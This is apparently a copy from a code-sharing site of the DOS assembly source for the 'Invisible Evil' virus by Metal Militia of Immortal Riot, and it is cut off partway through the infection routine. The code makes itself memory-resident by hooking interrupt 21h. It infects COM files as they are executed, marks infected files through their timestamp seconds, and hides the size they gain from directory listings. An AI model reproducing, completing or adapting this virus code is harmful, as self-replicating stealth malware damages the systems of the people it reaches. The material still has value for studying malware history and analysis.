📄 inv-evil.asm
字号:
; Virusname : Invisible Evil
; Virusauthor: Metal Militia
; Virusgroup : Immortal Riot
; Origin : Sweden
;
; It's a memory resident, stealth, infector of com files.
; It check for two nops a bit after the jmp to see if it's already
; infected or not, and to stealth it, it'll check the seconds.
; No destructive routine included in this version, perhaps to come(?)
; Um!.. well, enjoy Insane Reality issue #4!
; I think that's all for now, outa here..
;
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; INVISIBLE EVIL!
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
virus segment
assume cs:virus,ds:virus,es:nothing
org 100h
start: db 0E9h,02,00,90h,90h ; Jmp to vstart
vstart equ $
call code_start ; call codie_startie
code_start:
pop si
sub si,offset code_start ; so we can use the lea command etc
jmp code_continue
db ' Our past is ' ; Lil' poem (?)
db ' our future! ' ; of mine
code_continue:
mov bp,si ; Now, put bp in si instead so bp's used
jmp load ; Jmp and go resident
old_21 dd ? ; Old int21 interrupt saved here
new_21: ; Our own, new one int21
cmp ax,4b00h ; Is a file being executed
je exec1 ; If so, damn it! INFECT!
dir_thang:
cmp ah,11h ; Find first
je hide_size ; Use stealth
cmp ah,12h ; Find next
je hide_size ; Use stealth
cmp ax,3030h ; Another copy trying to go resident?
jne do_old ; If not, do the old int21 thang
mov bx,3030h ; Show that we're already resident
do_old: jmp dword ptr cs:[(old_21-vstart)] ; Jmp old int21
exec1: jmp exec ; Try to infect
do_dir: jmp dword ptr cs:[(old_21-vstart)] ; See do_old
ret ; But return back
hide_size:
pushf
push cs
call do_dir ; get FCB (current)
cmp al,00h ; Is DIR being used (?)
jz undocumented_get_FCB ; If so, go on
jmp dir_error ; If not, get the fuck
; outa this place man
undocumented_get_FCB:
push ax ; push
push bx ; push
push es ; push (gaak! no pops)
mov ah,51h ; get FCB (location)
int 21h ; figure it out
mov es,bx ; get FCB (info)
cmp bx,es:[16h] ; check it
je fix_it_up ; if so, move on
jmp not_inf
fix_it_up:
mov bx,dx ; fixup
mov al,[bx] ; some
push ax ; shit
mov ah,2fh ; get the DTA
int 21h ; yeah, you do that
pop ax ; atlast, pop me babe
inc al ; check FCB (extended)
jz add_it ; ok, move on
jmp normal_fcb ; jmp normal_fcb
add_it:
add bx,7h ; yes, add it.. go ahead
normal_fcb:
mov ax,es:[bx+17h]
and ax,1fh
xor al,01h ; are the file's seconds
jz go_on_and_do_it_strong ; equal to "2"?
jmp not_inf ; If so, outa here
go_on_and_do_it_strong:
and byte ptr es:[bx+17h],0e0h ; subtract the size
sub es:[bx+1dh],(vend-vstart) ; how much? (*.*)
sbb es:[bx+1fh],ax ; yet another stealthed
not_inf:pop es ; we will..
pop bx ; we will..
pop ax ; pop you! pop you!
dir_error:
iret ; return to the one who
; called this thang
exec:
push ax ; push the stuff needed
push bx ; (as normally)
push cx
push dx
push di
push si
push ds
push es
infect:
mov ax,3d02h ; Open the file being
int 21h ; executed do that!
jc fuckitall ; If error, get the fuck
; out!
xchg ax,bx ; or.. mov bx,ax
push ds ; pusha
push cs ; push
pop ds ; pop!
mov ah,3fh ; Read from file
mov dx,(buffer-vstart) ; put in our buffer
mov cx,5h ; how much to read
int 21h ; do that
jc fuckitall ; If error, fuck it!
cmp word ptr cs:[(buffer-vstart)],5A4Dh ; Is it an .EXE?
je fuckitall ; If so, outa here..
cmp word ptr cs:[(buffer-vstart)],4D5Ah ; The other form?
je fuckitall ; (can be MZ or ZM)
; If so, outa here
cmp word ptr cs:[(buffer-vstart)+3],9090h ; Ok, is it
je fuckitall ; infect? If so,
; outa here
jmp next ; Move on..
fuckitall:
jmp homey2 ; Something screwed,
; outa dis thang..
next:
mov ax,5700h ; Get date/time
int 21h ; int me baaaabe!
mov word ptr cs:[(old_time-vstart)],cx ; save time
mov word ptr cs:[(old_date-vstart)],dx ; save date
mov ax,4202h ; ftpr to end
mov cx,0 ; get ftpr (filesize)
cwd ; or.. xor dx,dx
int 21h
jc fuckitall ; if error, fuck it!
mov cx,ax ; mov cx to ax
sub cx,3 ; for the jmp
jmp save_rest_of_len
db ' [INVISIBLE EVIL!] (c) Metal Militia/Immortal Riot '
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -